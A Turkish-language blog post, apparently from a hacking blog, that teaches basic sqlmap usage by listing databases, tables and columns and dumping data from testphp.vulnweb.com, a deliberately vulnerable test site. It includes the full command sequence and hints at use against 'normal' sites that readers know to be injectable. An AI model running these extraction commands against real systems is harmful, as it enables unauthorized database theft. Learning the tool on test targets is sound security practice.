Sqlmap Basic Concepts Sqlmap Basic Concepts Sqlmap Basic Concepts Sqlmap Basic Concepts - Scorpiol

Sqlmap Basic Concepts

SQLMAP Geniş Bir Yapıya Sahiptir İçerisinde Bir Çok Komut Bulundurmaktadır. Bu Komutlara Ulaşmak İçin SQLMAP Üzerinden "sqlmap.py -h" Daha Detaylı Bir Anlatım İçinse "sqlmap.py -hh"
Komutunu Kullanabilirsiniz.

İlk Öncelikle SQL Denemelerimizi testphp.vulnweb.com Üzerinden Gerçekleştireceğiz Sizler Kendi Elinizde SQL Injection Açıklı Olduğuna Emin Olduğunuz Siteler Varsa Onu Kullanabilirsiniz.

Hedef Sitemizi Belirtmek İçin "-u" veya "--url" Parametresini Kullanıyoruz.

sqlmap.py -u testphp.vulnweb.com
sqlmap.py --url testphp.vulnweb.com

Belirledeğimiz Hedef Sitede SQL İnjection Zafiyeti Mevcutsa "--dbs" Parametresi İle Mevcut Veri Tabanlarını Çekebiliriz.
sqlmap.py -u testphp.vulnweb.com/search.php?test=query --dbs

Gördüğünüz Gibi Veri Tabanlarını Görmeyi Başardık Şimdi Bu Tabanları Aşağıdaki Size Gösterdiğimiz Şekilde "--dbs" Parametresini Kısaltarak "-D" Parametresini Kullanarak Veri Tabanını Belirtiyoruz Daha Sonra Veri Tabanlarını Çekmek İçin "-D" Parametresinin Sonuna Yukarda Size Verdiğimiz Görsel'deki Databases Bölümünde [*] acuart , [*] information_schema Bu Veri Tabanlarından Hangisi Hedef Veri Tabanınız ise Onu Seçebilirsiniz.

sqlmap.py -u testphp.vulnweb.com/search.php?test=query -D acuart,information_schema --tables

Daha Sonrasında ise "--tables" Parametresini Kısaltarak "-T" Yapıyor ve Çekmek İstediğiniz Tablo İsimlerini Yerleştiriyorsunuz Adı Belirtilen Kolonları Getirmesi İçinde En Sonuna "--columns" Parametresini Getiriyoruz.


sqlmap.py -u testphp.vulnweb.com/search.php?test=query -D acuart -T artists,carts --columns

Her Yeni İşlemimizde Kısalttığımız Gibi "--columns" Parametresinide "-C" Olarak Kısaltıyoruz Daha Sonrasında Çekmek İstediğimiz Kolonları Yazıyoruz Yazdıktan Sonra ise --dump Diyerek Datayı Çekiyoruz.

Ek Bilgi: Bütün Kolonları Dumpları Çekmek İçin "--dump-all" Parametresinide Kullanabilirsiniz.


sqlmap.py -u testphp.vulnweb.com/search.php?test=query -D acuart -T artists,carts -C cart_id,item,price,adesc,aname,artist?id --dump

Biz Size Gösterme Amaçlı Bir Test Sitesi Üzerinden Gösterdiğimiz İçin Veri Tabanı Boş Gösteriyor Eğer Normal Bir Site Olsaydı Bu Kısımlarda İstediğimiz Bilgiler Mevcut Olacaktı SQLMAP Öğrenmek İçin Bol Bol Denemeler Yapmanız Gerekiyor ve Aynı Zamandada Araştırmalar Bir Çok SQL İnjection Zafiyeti İle Alakalı Konular Blogumda Mevcut O Konularada Göz Atmak İçin Tıklayın!

0 Yorumlar

Yorum Gönder

Yorum Gönder (0)

Daha yeni Daha eski
Oxygen Chrome
xenforo eklentileri manuel sql injection hacker blog Sunucu Optimizasyon